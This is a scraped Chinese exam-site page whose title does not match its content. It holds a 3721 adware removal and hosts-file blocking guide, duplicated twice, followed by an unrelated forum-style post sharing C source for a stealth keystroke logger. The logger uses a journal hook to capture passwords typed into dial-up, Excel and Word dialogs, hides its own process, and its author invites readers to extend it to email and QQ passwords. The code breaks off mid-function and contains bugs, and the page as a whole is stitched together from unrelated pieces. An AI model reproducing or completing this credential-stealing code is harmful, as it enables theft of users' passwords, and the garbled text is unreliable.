学历|
高考
中考
考研
自考
成考
外语|
CET6
职称英语
商务英语
公共英语
资格|
公务员
报关员
银行
证券
司法
导游
教师
计算机|
等考
软考
工程|
一建
二建
造价师
监理师
咨询师
安全师
结构师
估价师
造价员
会计|
会计证
中级会计
注会
经济师
税务师
医学|
卫生资格
医师
药师
[更多]
怎样隐藏应用程序的任务条图标
下面将给大家卸载这个插件的详细过程。
由于这个3721网络实名插件是使用Rundll32.exe调用连接库的,系统无法终止Rundll32.exe进程,所以我们必须重新启动计算机,按 F8 进入安全模式(F8 只能按一次,千万不要多按!)。之后,单击 开始 -> 运行 regedit.exe 打开注册表,进入:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除键:CnsMin
其键值为:Rundll32.exe C:/WINNT/DOWNLO~1/CnsMin.dll,Rundll32
(如果是win98,这里的 C:/WINNT/DOWNLO~1/ 为 C:/WINDOWS/DOWNLO~1/)
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/AdvancedOptions/
删除整个目录:!CNS
这个目录在 Internet 选项 -> 高级 中加入了3721网络实名的选项。
HKEY_LOCAL_MACHINE/SOFTWARE/3721/ 以及 HKEY_CURRENT_USER/Software/3721/
删除整个目录:3721
注:如果您安装了3721的其它软件,如 极品飞猫 等,则应删除
整个目录:HKEY_LOCAL_MACHINE/SOFTWARE/3721/CnsMin
以及 HKEY_CURRENT_USER/Software/3721/CnsMin
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main/
删除键:CNSEnable 其键值为:a2c39d5f
删除键:CNSHint 其键值为:a2c39d5f
删除键:CNSList 其键值为:a2c39d5f
在删除完注册表中的项之后,还需要删除存储在硬盘中的3721网络实名文件。
删除如下文件:
C:/WINNT/DOWNLO~1 目录下
(这里的 C:/WINNT/DOWNLO~1/ 为 C:/WINDOWS/DOWNLO~1/ 下同)
2001-08-09 15:34 <DIR> 3721
2001-08-02 17:03 40,960 cnsio.dll
2001-08-08 14:14 102,400 CnsMin.dll
2001-08-24 23:14 42 CnsMin.ini
2001-08-09 10:18 13,848 CnsMinEx.cab
2001-07-06 17:57 32,768 CnsMinEx.dll
2001-08-25 02:52 115 CnsMinEx.ini
2001-08-25 02:51 17,945 CnsMinIO.cab
2001-08-02 17:02 32,768 CnsMinIO.dll
2001-08-24 23:15 40,793 CnsMinUp.cab
C:/WINNT/DOWNLO~1/3721 目录下
2001-08-02 17:03 40,960 cnsio.dll
2001-08-24 15:53 102,400 CnsMin.dll
2001-07-06 17:59 213 CnsMin.inf
2001-08-24 15:48 28,672 CnsMinIO.dll
以上文件全部删除,这样3721网络实名“病毒”就从您的计算机中全部清除了。
最后,重新启动计算机,进入正常模式。现在已经完全没有3721网络实名的捆饶了!
..:::[end]:::..
下面是禁止3721的方法:
卸载3721后,用记事本打开c:/windows/hosts(查找,说明为文件),加入以下字符(IP和域名之间用一个空格间隔开):
0.0.0.0 www.3721.com
0.0.0.0 cnsmin.3721.com
0.0.0.0 download.3721.com
保存的文件名为Hosts(注意不要加任何扩展名),Windows 98/Me的系统把该文件保存到Windows目录,Windows 2000/XP的系统把该文件保存到WINNT/system32/drivers/etc目录,如果已经有Hosts文件,直接替换就可以。然后打开浏览器观察结果,怎么样?再也看不到3721的对话框了吧?
同理,用Hosts文件还可以对付网页中的广告。现在很多大型网站,都有专门存放广告的主机,查看网页的源代码,就可以知道广告文件存放在哪台主机上,然后用Hosts文件解析这台主机的IP,就可以把这些广告拒之门外了。
也可以加速经常浏览的网站:X.X.X.X(空格)WWW.X.COM (IP为真实值)
..:::[other]:::..
另外可以使用多页面浏览器把
3721.com 218.244.44.10
3721.net 202.106.148.154
www.3721.com 218.244.44.10
www.3721.net 202.106.148.154
download.3721.com 218.244.44.34
download.3721.net 218.244.44.35
这些添加到黑名单,
把C段封杀
218.244.44.*
202.106.148.*
附件附上Hosts:
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
由于这个3721网络实名插件是使用Rundll32.exe调用连接库的,系统无法终止Rundll32.exe进程,所以我们必须重新启动计算机,按 F8 进入安全模式(F8 只能按一次,千万不要多按!)。之后,单击 开始 -> 运行 regedit.exe 打开注册表,进入:
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Run/
删除键:CnsMin
其键值为:Rundll32.exe C:/WINNT/DOWNLO~1/CnsMin.dll,Rundll32
(如果是win98,这里的 C:/WINNT/DOWNLO~1/ 为 C:/WINDOWS/DOWNLO~1/)
HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Internet Explorer/AdvancedOptions/
删除整个目录:!CNS
这个目录在 Internet 选项 -> 高级 中加入了3721网络实名的选项。
HKEY_LOCAL_MACHINE/SOFTWARE/3721/ 以及 HKEY_CURRENT_USER/Software/3721/
删除整个目录:3721
注:如果您安装了3721的其它软件,如 极品飞猫 等,则应删除
整个目录:HKEY_LOCAL_MACHINE/SOFTWARE/3721/CnsMin
以及 HKEY_CURRENT_USER/Software/3721/CnsMin
HKEY_CURRENT_USER/Software/Microsoft/Internet Explorer/Main/
删除键:CNSEnable 其键值为:a2c39d5f
删除键:CNSHint 其键值为:a2c39d5f
删除键:CNSList 其键值为:a2c39d5f
在删除完注册表中的项之后,还需要删除存储在硬盘中的3721网络实名文件。
删除如下文件:
C:/WINNT/DOWNLO~1 目录下
(这里的 C:/WINNT/DOWNLO~1/ 为 C:/WINDOWS/DOWNLO~1/ 下同)
2001-08-09 15:34 <DIR> 3721
2001-08-02 17:03 40,960 cnsio.dll
2001-08-08 14:14 102,400 CnsMin.dll
2001-08-24 23:14 42 CnsMin.ini
2001-08-09 10:18 13,848 CnsMinEx.cab
2001-07-06 17:57 32,768 CnsMinEx.dll
2001-08-25 02:52 115 CnsMinEx.ini
2001-08-25 02:51 17,945 CnsMinIO.cab
2001-08-02 17:02 32,768 CnsMinIO.dll
2001-08-24 23:15 40,793 CnsMinUp.cab
C:/WINNT/DOWNLO~1/3721 目录下
2001-08-02 17:03 40,960 cnsio.dll
2001-08-24 15:53 102,400 CnsMin.dll
2001-07-06 17:59 213 CnsMin.inf
2001-08-24 15:48 28,672 CnsMinIO.dll
以上文件全部删除,这样3721网络实名“病毒”就从您的计算机中全部清除了。
最后,重新启动计算机,进入正常模式。现在已经完全没有3721网络实名的捆饶了!
..:::[end]:::..
下面是禁止3721的方法:
卸载3721后,用记事本打开c:/windows/hosts(查找,说明为文件),加入以下字符(IP和域名之间用一个空格间隔开):
0.0.0.0 www.3721.com
0.0.0.0 cnsmin.3721.com
0.0.0.0 download.3721.com
保存的文件名为Hosts(注意不要加任何扩展名),Windows 98/Me的系统把该文件保存到Windows目录,Windows 2000/XP的系统把该文件保存到WINNT/system32/drivers/etc目录,如果已经有Hosts文件,直接替换就可以。然后打开浏览器观察结果,怎么样?再也看不到3721的对话框了吧?
同理,用Hosts文件还可以对付网页中的广告。现在很多大型网站,都有专门存放广告的主机,查看网页的源代码,就可以知道广告文件存放在哪台主机上,然后用Hosts文件解析这台主机的IP,就可以把这些广告拒之门外了。
也可以加速经常浏览的网站:X.X.X.X(空格)WWW.X.COM (IP为真实值)
..:::[other]:::..
另外可以使用多页面浏览器把
3721.com 218.244.44.10
3721.net 202.106.148.154
www.3721.com 218.244.44.10
www.3721.net 202.106.148.154
download.3721.com 218.244.44.34
download.3721.net 218.244.44.35
这些添加到黑名单,
把C段封杀
218.244.44.*
202.106.148.*
附件附上Hosts:
# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
127.0.0.1 3721.com #3721网络实名
127.0.0.1 3721.net #3721网络实名
127.0.0.1 cnsmin.3721.com #3721网络实名
127.0.0.1 download.3721.com #3721网络实名
127.0.0.1 www.3721.com #3721网络实名
127.0.0.1 www.3721.net #3721网络实名
一个截获用户输入密码程序
整理东西的时候翻出了个几年前的程序,功能是当用户输入拨号、EXCEL,WORD密码时,将其保存在一个文件里。程序用的是日志钩子,这样就不用象其他全局HOOK那样,必须单写一个DLL。
为了让初学者深入了解,将源代码贴上来,(SDK程序VC,BCB等WIN下的C编译器均可编译)象现在那些记录E-MAIL密码,OICQ密码等工具都是这原理,俺当时写着玩意的时候还没有OICQ。
有兴趣的可以自己加上。
#include <windows.h>
#define KeyPMask 0x80000000
#define SERVICE_PROC 1
#define UNSERVICE_PROC 0
#define RUN "//GmkMon.exe"
typedef struct tagKEYDATA{
char kKey;
SHORT kShift;
SHORT kCaps;
SHORT kNum;
BOOL bShift;
BOOL bCaps;
BOOL bNum;
}KEYDATA,*LPKEYDATA;
HHOOK hHook=NULL;
DWORD (WINAPI *RegisterServiceProcess)(DWORD,DWORD);
LRESULT CALLBACK WndProc (HWND, UINT, WPARAM, LPARAM) ;
LRESULT CALLBACK JournalRecordProc(int nCode,WPARAM wParam,LPARAM lParam);
BOOL WINAPI HideProc(int mode)
{
HINSTANCE DLLInst=LoadLibrary("KERNEL32.DLL");
if(DLLInst)
{
RegisterServiceProcess=(DWORD(WINAPI *)(DWORD,DWORD))
GetProcAddress(DLLInst,"RegisterServiceProcess");
if(RegisterServiceProcess)
{
RegisterServiceProcess(GetCurrentProcessId(),mode);
return TRUE;
}
else
return FALSE;
}
else return FALSE;
}
BOOL WINAPI IsPassWindow()
{
HWND hWnd,curHwnd;
TCHAR szTemp[MAX_PATH];
DWORD dwsTyle;
hWnd=GetActiveWindow();
if(hWnd==NULL) return FALSE;
curHwnd =hWnd;
while(curHwnd!=NULL)
{
hWnd=curHwnd;
curHwnd=GetParent(hWnd);
}
dwsTyle=GetWindowLong(hWnd,GWL_STYLE);
if(dwsTyle & ES_PASSWORD) //普通密码框
return TRUE;
else if(!lstrcmp(szTemp,"EDTBX")) //Excel密码
return TRUE;
else if(!lstrcmp(szTemp,"RichEdit20W") && (dwsTyle & WS_SYSMENU))
return TRUE; //WORD密码
GetWindowText(hWnd,szTemp, sizeof(szTemp));
if(!strncmp(szTemp,"连接到",6)) //拨号网络
return TRUE;
return FALSE;
}
TCHAR WINAPI GetKey(int nKey)
{
KEYDATA kd;
kd.kShift=GetKeyState(VK_SHIFT);
kd.kCaps=GetKeyState(0x14);
kd.kNum=GetKeyState(0x90);
kd.bShift=(kd.kShift & KeyPMask)==KeyPMask;
kd.bCaps=(kd.kCaps & 1)==1;
kd.bNum=(kd.kNum & 1)==1;
if(nKey>=48 && nKey<=57)
if(!kd.bShift) return (kd.kKey=nKey);
if(nKey>=65 && nKey<=90)
{
if(!kd.bCaps)
if(kd.bShift) kd.kKey=nKey;
else kd.kKey=nKey+32;
else if (kd.bShift) kd.kKey=nKey+32;
else kd.kKey=nKey;
return kd.kKey;
}
if(nKey>=96 && nKey<=105) // 小键盘0-9
if(kd.bNum)
return (kd.kKey=(nKey-96+48));
if(nKey>=186 && nKey<=222) // 其他键
{
switch(nKey)
{
case 186:
if(!kd.bShift) kd.kKey=';';else kd.kKey=':';
break;
case 187:
if(!kd.bShift) kd.kKey='=';else kd.kKey='+' ;
break;
case 188:
if (!kd.bShift) kd.kKey=',';else kd.kKey='<' ;
break;
case 189:
if (!kd.bShift) kd.kKey='-';else kd.kKey='_' ;
break;
case 190:
if (!kd.bShift) kd.kKey='.';else kd.kKey='>' ;
break;
case 191:
if (!kd.bShift) kd.kKey='/';else kd.kKey='?' ;
break;
case 192:
if (!kd.bShift) kd.kKey='`' ; else kd.kKey='~' ;
break;
case 219:
if (!kd.bShift) kd.kKey='[' ; else kd.kKey='{' ;
break;
case 220:
if (!kd.bShift) kd.kKey='//' ; else kd.kKey='|' ;
break;
case 221:
if (!kd.bShift) kd.kKey=']' ; else kd.kKey='}' ;
break;
case 222:
if (!kd.bShift) kd.kKey='//'; else kd.kKey='//';
break;
default:kd.kKey='n' ;break;
}
if(kd.kKey!='n') return kd.kKey;
}
}
视频学习
我考网版权与免责声明
① 凡本网注明稿件来源为"原创"的所有文字、图片和音视频稿件,版权均属本网所有。任何媒体、网站或个人转载、链接转贴或以其他方式复制发表时必须注明"稿件来源:我考网",违者本网将依法追究责任;
② 本网部分稿件来源于网络,任何单位或个人认为我考网发布的内容可能涉嫌侵犯其合法权益,应该及时向我考网书面反馈,并提供身份证明、权属证明及详细侵权情况证明,我考网在收到上述法律文件后,将会尽快移除被控侵权内容。
